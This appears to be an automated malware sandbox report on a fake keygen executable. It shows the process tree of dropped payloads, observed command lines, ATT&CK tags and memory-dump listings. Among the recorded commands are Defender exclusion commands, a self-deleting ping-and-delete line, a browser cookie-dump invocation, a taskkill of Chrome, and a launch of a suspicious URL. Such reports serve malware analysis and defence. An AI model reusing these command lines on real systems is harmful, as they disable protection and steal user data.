Suspicious use of WriteProcessMemory 58 IoCs

description	pid	Process	procid_target
PID 1056 wrote to memory of 1296	1056	3d_Video_Player_4_5_serial_maker.exe	78
PID 1056 wrote to memory of 1296	1056	3d_Video_Player_4_5_serial_maker.exe	78
PID 1056 wrote to memory of 1296	1056	3d_Video_Player_4_5_serial_maker.exe	78
PID 1296 wrote to memory of 3576	1296	cmd.exe	81
PID 1296 wrote to memory of 3576	1296	cmd.exe	81
PID 1296 wrote to memory of 3576	1296	cmd.exe	81
PID 1296 wrote to memory of 1528	1296	cmd.exe	82
PID 1296 wrote to memory of 1528	1296	cmd.exe	82
PID 1296 wrote to memory of 1528	1296	cmd.exe	82
PID 1296 wrote to memory of 1488	1296	cmd.exe	83
PID 1296 wrote to memory of 1488	1296	cmd.exe	83
PID 1296 wrote to memory of 1488	1296	cmd.exe	83
PID 1296 wrote to memory of 2064	1296	cmd.exe	84
PID 1296 wrote to memory of 2064	1296	cmd.exe	84
PID 1296 wrote to memory of 2064	1296	cmd.exe	84
PID 3576 wrote to memory of 2124	3576	keygen-pr.exe	85
PID 3576 wrote to memory of 2124	3576	keygen-pr.exe	85
PID 3576 wrote to memory of 2124	3576	keygen-pr.exe	85
PID 2064 wrote to memory of 2532	2064	keygen-step-4.exe	86
PID 2064 wrote to memory of 2532	2064	keygen-step-4.exe	86
PID 1488 wrote to memory of 1132	1488	keygen-step-3.exe	88
PID 1488 wrote to memory of 1132	1488	keygen-step-3.exe	88
PID 1488 wrote to memory of 1132	1488	keygen-step-3.exe	88
PID 2124 wrote to memory of 3988	2124	key.exe	89
PID 2124 wrote to memory of 3988	2124	key.exe	89
PID 2124 wrote to memory of 3988	2124	key.exe	89
PID 2124 wrote to memory of 3988	2124	key.exe	89
PID 2124 wrote to memory of 3988	2124	key.exe	89
PID 2124 wrote to memory of 3988	2124	key.exe	89
PID 2124 wrote to memory of 3988	2124	key.exe	89
PID 2124 wrote to memory of 3988	2124	key.exe	89
PID 2124 wrote to memory of 3988	2124	key.exe	89
PID 2124 wrote to memory of 3988	2124	key.exe	89
PID 2124 wrote to memory of 3988	2124	key.exe	89
PID 2124 wrote to memory of 3988	2124	key.exe	89
PID 2124 wrote to memory of 3988	2124	key.exe	89
PID 2124 wrote to memory of 3988	2124	key.exe	89
PID 2124 wrote to memory of 3988	2124	key.exe	89
PID 1132 wrote to memory of 2416	1132	cmd.exe	90
PID 1132 wrote to memory of 2416	1132	cmd.exe	90
PID 1132 wrote to memory of 2416	1132	cmd.exe	90
PID 2532 wrote to memory of 3736	2532	Setup.exe	92
PID 2532 wrote to memory of 3736	2532	Setup.exe	92
PID 2532 wrote to memory of 4008	2532	Setup.exe	93
PID 2532 wrote to memory of 4008	2532	Setup.exe	93
PID 2532 wrote to memory of 4008	2532	Setup.exe	93
PID 2064 wrote to memory of 548	2064	keygen-step-4.exe	94
PID 2064 wrote to memory of 548	2064	keygen-step-4.exe	94
PID 2064 wrote to memory of 548	2064	keygen-step-4.exe	94
PID 4008 wrote to memory of 188	4008	setups.exe	95
PID 4008 wrote to memory of 188	4008	setups.exe	95
PID 4008 wrote to memory of 188	4008	setups.exe	95
PID 548 wrote to memory of 4212	548	askinstall20.exe	98
PID 548 wrote to memory of 4212	548	askinstall20.exe	98
PID 548 wrote to memory of 4212	548	askinstall20.exe	98
PID 4212 wrote to memory of 4308	4212	cmd.exe	100
PID 4212 wrote to memory of 4308	4212	cmd.exe	100
PID 4212 wrote to memory of 4308	4212	cmd.exe	100

C:\Users\Admin\AppData\Local\Temp\3d_Video_Player_4_5_serial_maker.exe
"C:\Users\Admin\AppData\Local\Temp\3d_Video_Player_4_5_serial_maker.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1056
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1296
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3576
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:2124
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        Executes dropped EXE
        
        PID:3988
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:1528
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1488
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1132
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        Runs ping.exe
        
        PID:2416
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2064
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2532
    - - C:\Users\Admin\AppData\Local\Temp\DAKRN54EAT\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\DAKRN54EAT\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3736
      - C:\Users\Admin\AppData\Local\Temp\DAKRN54EAT\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\DAKRN54EAT\multitimer.exe" 1 3.1616696285.605cd3dd0d26b 101
        6⤵
        
        PID:4948
        
        C:\Users\Admin\AppData\Local\Temp\DAKRN54EAT\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\DAKRN54EAT\multitimer.exe" 2 3.1616696285.605cd3dd0d26b
        7⤵
        
        PID:4064
        
        C:\Users\Admin\AppData\Local\Temp\00fcqbogvxd\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\00fcqbogvxd\vict.exe" /VERYSILENT /id=535
        8⤵
        
        PID:2052
        
        C:\Users\Admin\AppData\Local\Temp\is-CLEAM.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-CLEAM.tmp\vict.tmp" /SL5="$502EE,870426,780800,C:\Users\Admin\AppData\Local\Temp\00fcqbogvxd\vict.exe" /VERYSILENT /id=535
        9⤵
        
        PID:1216
        
        C:\Users\Admin\AppData\Local\Temp\is-L0PA9.tmp\winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-L0PA9.tmp\winhost.exe" 535
        10⤵
        
        PID:5804
        
        C:\Users\Admin\AppData\Local\Temp\42zxvp3wyzn\h5gmn5rrk4j.exe
        
        "C:\Users\Admin\AppData\Local\Temp\42zxvp3wyzn\h5gmn5rrk4j.exe" /VERYSILENT
        8⤵
        
        PID:4108
        
        C:\Users\Admin\AppData\Local\Temp\is-PC28J.tmp\h5gmn5rrk4j.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-PC28J.tmp\h5gmn5rrk4j.tmp" /SL5="$702F0,2592217,780800,C:\Users\Admin\AppData\Local\Temp\42zxvp3wyzn\h5gmn5rrk4j.exe" /VERYSILENT
        9⤵
        
        PID:4396
        
        C:\Users\Admin\AppData\Local\Temp\is-UQV7B.tmp\winlthsth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-UQV7B.tmp\winlthsth.exe"
        10⤵
        
        PID:5852
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 824
        11⤵
        Program crash
        
        PID:5192
        
        C:\Users\Admin\AppData\Local\Temp\wpov54xrfb0\AwesomePoolU1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wpov54xrfb0\AwesomePoolU1.exe"
        8⤵
        
        PID:3808
        
        C:\Users\Admin\AppData\Local\Temp\3a1hb2nfpy5\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3a1hb2nfpy5\Setup3310.exe" /Verysilent /subid=577
        8⤵
        
        PID:4460
        
        C:\Users\Admin\AppData\Local\Temp\is-7URJT.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-7URJT.tmp\Setup3310.tmp" /SL5="$2021A,138429,56832,C:\Users\Admin\AppData\Local\Temp\3a1hb2nfpy5\Setup3310.exe" /Verysilent /subid=577
        9⤵
        
        PID:2632
        
        C:\Users\Admin\AppData\Local\Temp\is-7F9KC.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-7F9KC.tmp\Setup.exe" /Verysilent
        10⤵
        
        PID:3848
        
        C:\Program Files (x86)\Versium Research\Versium Research\customer5.exe
        
        "C:\Program Files (x86)\Versium Research\Versium Research\customer5.exe"
        11⤵
        
        PID:5720
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"
        12⤵
        
        PID:5960
        
        C:\Program Files (x86)\Versium Research\Versium Research\hjjgaa.exe
        
        "C:\Program Files (x86)\Versium Research\Versium Research\hjjgaa.exe"
        11⤵
        
        PID:4988
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        12⤵
        
        PID:6028
        
        C:\Program Files (x86)\Versium Research\Versium Research\RunWW.exe
        
        "C:\Program Files (x86)\Versium Research\Versium Research\RunWW.exe"
        11⤵
        
        PID:5184
        
        C:\Program Files (x86)\Versium Research\Versium Research\jg7_7wjg.exe
        
        "C:\Program Files (x86)\Versium Research\Versium Research\jg7_7wjg.exe"
        11⤵
        
        PID:1516
        
        C:\Program Files (x86)\Versium Research\Versium Research\LabPicV3.exe
        
        "C:\Program Files (x86)\Versium Research\Versium Research\LabPicV3.exe"
        11⤵
        
        PID:5300
        
        C:\Users\Admin\AppData\Local\Temp\is-EPE9P.tmp\LabPicV3.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-EPE9P.tmp\LabPicV3.tmp" /SL5="$2027E,239334,155648,C:\Program Files (x86)\Versium Research\Versium Research\LabPicV3.exe"
        12⤵
        
        PID:4060
        
        C:\Users\Admin\AppData\Local\Temp\is-3OA7E.tmp\ppppppfy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-3OA7E.tmp\ppppppfy.exe" /S /UID=lab214
        13⤵
        
        PID:6068
        
        C:\Program Files (x86)\Versium Research\Versium Research\vlcplayer.exe
        
        "C:\Program Files (x86)\Versium Research\Versium Research\vlcplayer.exe"
        11⤵
        
        PID:5452
        
        C:\Program Files (x86)\Versium Research\Versium Research\Z7pGMA6DzfieVAOXDEtkk7kL.exe
        
        "C:\Program Files (x86)\Versium Research\Versium Research\Z7pGMA6DzfieVAOXDEtkk7kL.exe"
        11⤵
        
        PID:5520
        
        C:\Users\Admin\Documents\wtMZM1ZgJh0Knz5Z5UpqEbo2.exe
        
        "C:\Users\Admin\Documents\wtMZM1ZgJh0Knz5Z5UpqEbo2.exe"
        12⤵
        
        PID:5888
        
        C:\Program Files (x86)\Versium Research\Versium Research\lylal220.exe
        
        "C:\Program Files (x86)\Versium Research\Versium Research\lylal220.exe"
        11⤵
        
        PID:4356
        
        C:\Users\Admin\AppData\Local\Temp\is-ASC10.tmp\lylal220.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-ASC10.tmp\lylal220.tmp" /SL5="$4030C,491750,408064,C:\Program Files (x86)\Versium Research\Versium Research\lylal220.exe"
        12⤵
        
        PID:3736
        
        C:\Program Files (x86)\Versium Research\Versium Research\RmSetp.exe
        
        "C:\Program Files (x86)\Versium Research\Versium Research\RmSetp.exe"
        11⤵
        
        PID:4404
        
        C:\ProgramData\3303649.exe
        
        "C:\ProgramData\3303649.exe"
        12⤵
        
        PID:5924
        
        C:\ProgramData\7786298.exe
        
        "C:\ProgramData\7786298.exe"
        12⤵
        
        PID:5284
        
        C:\ProgramData\8541712.exe
        
        "C:\ProgramData\8541712.exe"
        12⤵
        
        PID:4636
        
        C:\ProgramData\459290.exe
        
        "C:\ProgramData\459290.exe"
        12⤵
        
        PID:6060
        
        C:\Program Files (x86)\Versium Research\Versium Research\YiXjaRalM3qf.exe
        
        "C:\Program Files (x86)\Versium Research\Versium Research\YiXjaRalM3qf.exe"
        11⤵
        
        PID:2628
        
        C:\Users\Admin\AppData\Local\Temp\sbi4m4swvgq\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sbi4m4swvgq\vpn.exe" /silent /subid=482
        8⤵
        
        PID:1576
        
        C:\Users\Admin\AppData\Local\Temp\is-90QUQ.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-90QUQ.tmp\vpn.tmp" /SL5="$103D4,15170975,270336,C:\Users\Admin\AppData\Local\Temp\sbi4m4swvgq\vpn.exe" /silent /subid=482
        9⤵
        
        PID:3940
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
        10⤵
        
        PID:5324
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe remove tap0901
        11⤵
        
        PID:3200
        
        C:\Users\Admin\AppData\Local\Temp\eaqeunbmrpy\IBInstaller_97039.exe
        
        "C:\Users\Admin\AppData\Local\Temp\eaqeunbmrpy\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        8⤵
        
        PID:400
        
        C:\Users\Admin\AppData\Local\Temp\is-FKUJ7.tmp\IBInstaller_97039.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-FKUJ7.tmp\IBInstaller_97039.tmp" /SL5="$10428,9884624,721408,C:\Users\Admin\AppData\Local\Temp\eaqeunbmrpy\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        9⤵
        
        PID:5196
        
        C:\Users\Admin\AppData\Local\Temp\is-NFOPE.tmp\{app}\chrome_proxy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-NFOPE.tmp\{app}\chrome_proxy.exe"
        10⤵
        
        PID:5512
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c start http://italyfabricone.club/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
        10⤵
        
        PID:5444
        
        C:\Users\Admin\AppData\Local\Temp\jge1pot3ztc\pbyme0fy3v2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jge1pot3ztc\pbyme0fy3v2.exe" /1-610
        8⤵
        
        PID:5176
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Patient-Snowflake'
        9⤵
        
        PID:5268
        
        C:\Users\Admin\AppData\Local\Temp\phd1x31wgsm\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\phd1x31wgsm\app.exe" /8-23
        8⤵
        
        PID:5304
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Sparkling-Thunder"
        9⤵
        
        PID:5880
        
        C:\Program Files (x86)\Sparkling-Thunder\7za.exe
        
        "C:\Program Files (x86)\Sparkling-Thunder\7za.exe" e -p154.61.71.51 winamp-plugins.7z
        9⤵
        
        PID:5976
        
        C:\Users\Admin\AppData\Local\Temp\ku3ll5piart\y44htg3gt2u.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ku3ll5piart\y44htg3gt2u.exe" /quiet SILENT=1 AF=756
        8⤵
        
        PID:5372
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ku3ll5piart\y44htg3gt2u.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ku3ll5piart\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1616437198 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
        9⤵
        
        PID:5988
    - - C:\Users\Admin\AppData\Local\Temp\TBDBVWBD1I\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\TBDBVWBD1I\setups.exe" ll
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4008
      - C:\Users\Admin\AppData\Local\Temp\is-FBNR5.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-FBNR5.tmp\setups.tmp" /SL5="$301F4,383902,148480,C:\Users\Admin\AppData\Local\Temp\TBDBVWBD1I\setups.exe" ll
        6⤵
        Executes dropped EXE
        Checks computer location settings
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:188
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:548
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4212
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4308
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
      4⤵
      PID:4996
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
      4⤵
      PID:5548
    - - C:\Users\Admin\AppData\Roaming\F38D.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\F38D.tmp.exe"
        5⤵
        
        PID:5440
      - C:\Users\Admin\AppData\Roaming\F38D.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\F38D.tmp.exe"
        6⤵
        
        PID:4184
    - - C:\Users\Admin\AppData\Roaming\FC39.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\FC39.tmp.exe"
        5⤵
        
        PID:5540
    - - C:\Users\Admin\AppData\Local\Temp\4975032e..exe
        
        "C:\Users\Admin\AppData\Local\Temp\4975032e..exe"
        5⤵
        
        PID:5708

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4412

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4480

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4768

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4852

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:3900
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 5B4B7E460AD49C2DCAE8DAD758B66C77 C
  2⤵
  PID:1592

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/188-60-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/188-49-0x0000000002321000-0x0000000002323000-memory.dmp

Filesize
8KB

Download
memory/188-57-0x00000000032E1000-0x00000000032E8000-memory.dmp

Filesize
28KB

Download
memory/188-53-0x0000000003161000-0x000000000318C000-memory.dmp

Filesize
172KB

Download
memory/400-129-0x0000000000401000-0x00000000004A9000-memory.dmp

Filesize
672KB

Download
memory/1216-110-0x00000000007F0000-0x00000000007F1000-memory.dmp

Filesize
4KB

Download
memory/1576-126-0x0000000000401000-0x0000000000417000-memory.dmp

Filesize
88KB

Download
memory/2052-92-0x0000000000401000-0x00000000004B7000-memory.dmp

Filesize
728KB

Download
memory/2124-25-0x0000000002DE0000-0x0000000002F7C000-memory.dmp

Filesize
1.6MB

Download
memory/2124-68-0x0000000003760000-0x000000000384F000-memory.dmp

Filesize
956KB

Download
memory/2124-79-0x0000000000EC0000-0x0000000000EC1000-memory.dmp

Filesize
4KB

Download
memory/2124-80-0x0000000000EB0000-0x0000000000ECB000-memory.dmp

Filesize
108KB

Download
memory/2532-23-0x00007FFF2BC20000-0x00007FFF2C60C000-memory.dmp

Filesize
9.9MB

Download
memory/2532-32-0x000000001B2C0000-0x000000001B2C2000-memory.dmp

Filesize
8KB

Download
memory/2532-24-0x00000000003F0000-0x00000000003F1000-memory.dmp

Filesize
4KB

Download
memory/2628-267-0x0000000000B50000-0x0000000000B51000-memory.dmp

Filesize
4KB

Download
memory/2628-259-0x000000006EE40000-0x000000006F52E000-memory.dmp

Filesize
6.9MB

Download
memory/2628-278-0x0000000005510000-0x0000000005511000-memory.dmp

Filesize
4KB

Download
memory/2628-275-0x0000000005560000-0x0000000005561000-memory.dmp

Filesize
4KB

Download
memory/2628-281-0x0000000005730000-0x0000000005731000-memory.dmp

Filesize
4KB

Download
memory/2628-272-0x00000000059C0000-0x00000000059C1000-memory.dmp

Filesize
4KB

Download
memory/2632-139-0x0000000005060000-0x0000000005061000-memory.dmp

Filesize
4KB

Download
memory/2632-130-0x0000000005000000-0x0000000005001000-memory.dmp

Filesize
4KB

Download
memory/2632-137-0x0000000005050000-0x0000000005051000-memory.dmp

Filesize
4KB

Download
memory/2632-159-0x0000000005110000-0x0000000005111000-memory.dmp

Filesize
4KB

Download
memory/2632-157-0x00000000050F0000-0x00000000050F1000-memory.dmp

Filesize
4KB

Download
memory/2632-155-0x00000000050D0000-0x00000000050D1000-memory.dmp

Filesize
4KB

Download
memory/2632-156-0x00000000050E0000-0x00000000050E1000-memory.dmp

Filesize
4KB

Download
memory/2632-136-0x0000000005040000-0x0000000005041000-memory.dmp

Filesize
4KB

Download
memory/2632-117-0x0000000002221000-0x000000000224C000-memory.dmp

Filesize
172KB

Download
memory/2632-140-0x0000000005070000-0x0000000005071000-memory.dmp

Filesize
4KB

Download
memory/2632-143-0x0000000005090000-0x0000000005091000-memory.dmp

Filesize
4KB

Download
memory/2632-135-0x0000000005030000-0x0000000005031000-memory.dmp

Filesize
4KB

Download
memory/2632-142-0x0000000005080000-0x0000000005081000-memory.dmp

Filesize
4KB

Download
memory/2632-134-0x0000000005020000-0x0000000005021000-memory.dmp

Filesize
4KB

Download
memory/2632-145-0x00000000050A0000-0x00000000050A1000-memory.dmp

Filesize
4KB

Download
memory/2632-133-0x0000000005010000-0x0000000005011000-memory.dmp

Filesize
4KB

Download
memory/2632-153-0x00000000050C0000-0x00000000050C1000-memory.dmp

Filesize
4KB

Download
memory/2632-158-0x0000000005100000-0x0000000005101000-memory.dmp

Filesize
4KB

Download
memory/2632-152-0x00000000050B0000-0x00000000050B1000-memory.dmp

Filesize
4KB

Download
memory/2632-127-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/3736-40-0x0000000002A30000-0x00000000033D0000-memory.dmp

Filesize
9.6MB

Download
memory/3736-58-0x0000000000F50000-0x0000000000F52000-memory.dmp

Filesize
8KB

Download
memory/3736-274-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/3808-186-0x0000000002D94000-0x0000000002D95000-memory.dmp

Filesize
4KB

Download
memory/3808-86-0x0000000002DA0000-0x0000000003740000-memory.dmp

Filesize
9.6MB

Download
memory/3808-91-0x0000000002D90000-0x0000000002D92000-memory.dmp

Filesize
8KB

Download
memory/3940-167-0x00000000038F0000-0x00000000038F1000-memory.dmp

Filesize
4KB

Download
memory/3940-131-0x0000000003291000-0x0000000003476000-memory.dmp

Filesize
1.9MB

Download
memory/3940-164-0x0000000003A91000-0x0000000003A9D000-memory.dmp

Filesize
48KB

Download
memory/3940-163-0x0000000003901000-0x0000000003909000-memory.dmp

Filesize
32KB

Download
memory/3940-162-0x00000000037A0000-0x00000000037A1000-memory.dmp

Filesize
4KB

Download
memory/3940-160-0x0000000002210000-0x0000000002211000-memory.dmp

Filesize
4KB

Download
memory/3988-54-0x0000000000400000-0x0000000000983000-memory.dmp

Filesize
5.5MB

Download
memory/3988-28-0x0000000000400000-0x0000000000983000-memory.dmp

Filesize
5.5MB

Download
memory/4008-59-0x0000000000401000-0x000000000040C000-memory.dmp

Filesize
44KB

Download
memory/4060-271-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/4064-78-0x0000000002DE0000-0x0000000002DE2000-memory.dmp

Filesize
8KB

Download
memory/4064-75-0x0000000002DF0000-0x0000000003790000-memory.dmp

Filesize
9.6MB

Download
memory/4184-229-0x0000000000400000-0x0000000000449000-memory.dmp

Filesize
292KB

Download
memory/4184-232-0x0000000000400000-0x0000000000449000-memory.dmp

Filesize
292KB

Download
memory/4396-106-0x0000000000730000-0x0000000000731000-memory.dmp

Filesize
4KB

Download
memory/4404-257-0x00007FFF2A300000-0x00007FFF2ACEC000-memory.dmp

Filesize
9.9MB

Download
memory/4404-268-0x0000000000F00000-0x0000000000F01000-memory.dmp

Filesize
4KB

Download
memory/4404-277-0x0000000000F10000-0x0000000000F23000-memory.dmp

Filesize
76KB

Download
memory/4404-279-0x0000000001130000-0x0000000001131000-memory.dmp

Filesize
4KB

Download
memory/4404-263-0x00000000009F0000-0x00000000009F1000-memory.dmp

Filesize
4KB

Download
memory/4404-276-0x000000001CC50000-0x000000001CC52000-memory.dmp

Filesize
8KB

Download
memory/4460-104-0x0000000000401000-0x000000000040B000-memory.dmp

Filesize
40KB

Download
memory/4948-66-0x0000000002770000-0x0000000003110000-memory.dmp

Filesize
9.6MB

Download
memory/4948-71-0x0000000002760000-0x0000000002762000-memory.dmp

Filesize
8KB

Download
memory/5184-280-0x0000000002E40000-0x0000000002E41000-memory.dmp

Filesize
4KB

Download
memory/5184-283-0x0000000000400000-0x0000000000499000-memory.dmp

Filesize
612KB

Download
memory/5184-282-0x0000000002D30000-0x0000000002DC6000-memory.dmp

Filesize
600KB

Download
memory/5192-190-0x00000000047D0000-0x00000000047D1000-memory.dmp

Filesize
4KB

Download
memory/5196-161-0x00000000023D0000-0x00000000023D1000-memory.dmp

Filesize
4KB

Download
memory/5268-168-0x0000000007310000-0x0000000007311000-memory.dmp

Filesize
4KB

Download
memory/5268-141-0x000000006EE40000-0x000000006F52E000-memory.dmp

Filesize
6.9MB

Download
memory/5268-206-0x00000000048B3000-0x00000000048B4000-memory.dmp

Filesize
4KB

Download
memory/5268-209-0x0000000009590000-0x0000000009591000-memory.dmp

Filesize
4KB

Download
memory/5268-177-0x0000000008370000-0x0000000008371000-memory.dmp

Filesize
4KB

Download
memory/5268-202-0x0000000008420000-0x0000000008421000-memory.dmp

Filesize
4KB

Download
memory/5268-175-0x0000000007AD0000-0x0000000007AD1000-memory.dmp

Filesize
4KB

Download
memory/5268-203-0x0000000009400000-0x0000000009401000-memory.dmp

Filesize
4KB

Download
memory/5268-169-0x0000000007B40000-0x0000000007B41000-memory.dmp

Filesize
4KB

Download
